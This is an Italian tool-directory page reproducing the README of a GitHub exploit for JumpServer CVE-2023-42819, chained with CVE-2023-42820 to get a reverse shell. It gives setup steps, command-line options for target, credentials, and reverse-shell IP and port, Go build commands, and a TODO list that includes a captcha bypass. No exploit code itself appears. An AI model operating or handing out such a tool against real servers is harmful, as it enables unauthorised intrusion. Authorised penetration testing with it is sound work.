Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Strumenti/GitHubGitHub/c1ph3rx13/cve-2023-42819
Generazione di PayloadAnalisi delle VulnerabilitàExploitShellcodeSfruttamento di Applicazioni WebPenetration Testing
GitHubc1ph3rx13/cve-2023-42819

CVE-2023-42819

CVE-2023-42819

Vedi Repository
6312 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2023-42819

CVE-2023-42819

Descrizione della vulnerabilità

Vulnerabilità di scrittura arbitraria di file in JumpServer

CVE-2023-42819 + CVE-2023-42820 = GetShell

USO

  1. Posizionare lo script e i file necessari nella stessa directory

  2. Assicurarsi di aver installato Google Chrome e ottenere il numero di versione di Google Chrome

root@kitploit:~
reg query "HKEY_CURRENT_USER\Software\Google\Chrome\BLBeacon" /v version
  1. Scaricare chromedriver corrispondente alla versione di Google Chrome e al sistema, quindi inserirlo in webdriver

    Ultima versione: https://googlechromelabs.github.io/chrome-for-testing/

    Versioni precedenti: https://chromedriver.chromium.org/downloads/version-selection

    Che pretese : (

  2. Mettere in ascolto l'IP e la Porta corrispondenti, attendere la shell inversa

Versione Python

root@kitploit:~
 ██████╗██╗   ██╗███████╗    ██████╗  ██████╗ ██████╗ ██████╗       ██╗  ██╗██████╗  █████╗  ██╗ █████╗
██╔════╝██║   ██║██╔════╝    ╚════██╗██╔═████╗╚════██╗╚════██╗      ██║  ██║╚════██╗██╔══██╗███║██╔══██╗
██║     ██║   ██║█████╗█████╗ █████╔╝██║██╔██║ █████╔╝ █████╔╝█████╗███████║ █████╔╝╚█████╔╝╚██║╚██████║
██║     ╚██╗ ██╔╝██╔══╝╚════╝██╔═══╝ ████╔╝██║██╔═══╝  ╚═══██╗╚════╝╚════██║██╔═══╝ ██╔══██╗ ██║ ╚═══██║
╚██████╗ ╚████╔╝ ███████╗    ███████╗╚██████╔╝███████╗██████╔╝           ██║███████╗╚█████╔╝ ██║ █████╔╝
 ╚═════╝  ╚═══╝  ╚══════╝    ╚══════╝ ╚═════╝ ╚══════╝╚═════╝            ╚═╝╚══════╝ ╚════╝  ╚═╝ ╚════╝

                                                                            @Auth: C1ph3rX13
                                                                            @Blog: https://c1ph3rx13.github.io
                                                                            @Note: Il codice è solo per scopi didattici, non utilizzarlo per altri scopi

usage: CVE-2023-42819-Fin.py [-h] -t TARGET -u USERNAME -p PASSWORD --ip IP --port PORT [--proxy PROXY]

CVE-2023-42819 di C1ph3rX13.

optional arguments:
  -h, --help            mostra questo messaggio di aiuto ed esce
  -t TARGET, --target TARGET
                        URL target
  -u USERNAME, --username USERNAME
                        nome utente dell'account
  -p PASSWORD, --password PASSWORD
                        password dell'account
  --ip IP               IP della shell
  --port PORT           porta della shell
  --proxy PROXY         proxy verso http://ip:port
Scarica lo strumento

image-1

image-1

Versione Go

Build

root@kitploit:~
go mod init CVE-2023-42819
go mod tidy
go build -ldflags="-s -w" -trimpath

Esecuzione

root@kitploit:~
.\CVE-2023-42819.exe -t http://IP:Port -u username -p password -ip IP -port Port -proxy proxyUrl
             

        ██████╗██╗   ██╗███████╗    ██████╗  ██████╗ ██████╗ ██████╗       ██╗  ██╗██████╗  █████╗  ██╗ █████╗  
        ██╔════╝██║   ██║██╔════╝    ╚════██╗██╔═████╗╚════██╗╚════██╗      ██║  ██║╚════██╗██╔══██╗███║██╔══██╗
        ██║     ██║   ██║█████╗█████╗ █████╔╝██║██╔██║ █████╔╝ █████╔╝█████╗███████║ █████╔╝╚█████╔╝╚██║╚██████║
        ██║     ╚██╗ ██╔╝██╔══╝╚════╝██╔═══╝ ████╔╝██║██╔═══╝  ╚═══██╗╚════╝╚════██║██╔═══╝ ██╔══██╗ ██║ ╚═══██║
        ╚██████╗ ╚████╔╝ ███████╗    ███████╗╚██████╔╝███████╗██████╔╝           ██║███████╗╚█████╔╝ ██║ █████╔╝
        ╚═════╝  ╚═══╝  ╚══════╝    ╚══════╝ ╚═════╝ ╚══════╝╚═════╝            ╚═╝╚══════╝ ╚════╝  ╚═╝ ╚════╝  
                                                                                                                
    @Auth: C1ph3rX13                                                                                            
    @Blog: https://c1ph3rx13.github.io                                                                          
    @Note: Il codice è solo per scopi didattici, non utilizzarlo per altri scopi                                                                   

Usage of CVE-2023-42819.exe:
  -ip string                                                                  
        IP della shell
  -p string
        Password dell'account
  -port string
        Porta della shell
  -proxy string
        URL del proxy
  -t string
        URL target
  -u string
        Nome utente dell'account

image-1

TODO

  • Risolvere il modo poco elegante di gestire il cross-origin
  • Riscrivere usando httpx
  • Aggiungere funzionalità EXP
  • Riscrivere usando go-resty
  • Bypass del captcha quando si inserisce una password errata durante il login
  • Aggiungere tipi di shell inversa
  • Utilizzare la modalità headless per compatibilità con Linux
  • Aggiungere proxy http, https, socks
  • CVE-2023-42819 + CVE-2023-42820 GetShell con un clic
  • Ho alzato tante bandiere, forse non le completerò mai : (

Manutenzione

  • 2023-10-18 Aggiunta rilevazione automatica del bypass del sito web - Versione Python
  • 2023-10-18 Refactoring delle funzioni client
  • 2023-10-18 Semplificazione della logica di esecuzione
  • 2023-10-18 Testato con Linux OK - Versione Go

Disclaimer

  1. Questo strumento è destinato esclusivamente a professionisti della sicurezza informatica autorizzati per test di penetrazione e a operatori di rete che svolgono attività di manutenzione ordinaria. Gli utenti possono scaricare, copiare, distribuire o utilizzare lo strumento solo dopo aver ottenuto un'adeguata autorizzazione legale e per scopi non commerciali.
  2. Durante l'utilizzo di questo strumento, l'utente deve garantire che tutte le proprie azioni siano conformi alle leggi e ai regolamenti locali, e non deve utilizzare questo software per attività che violano le leggi della Repubblica Popolare Cinese. Tutti gli autori e contributori di questo strumento non si assumono alcuna responsabilità per eventuali attività illegali intraprese dagli utenti utilizzando questo strumento senza autorizzazione.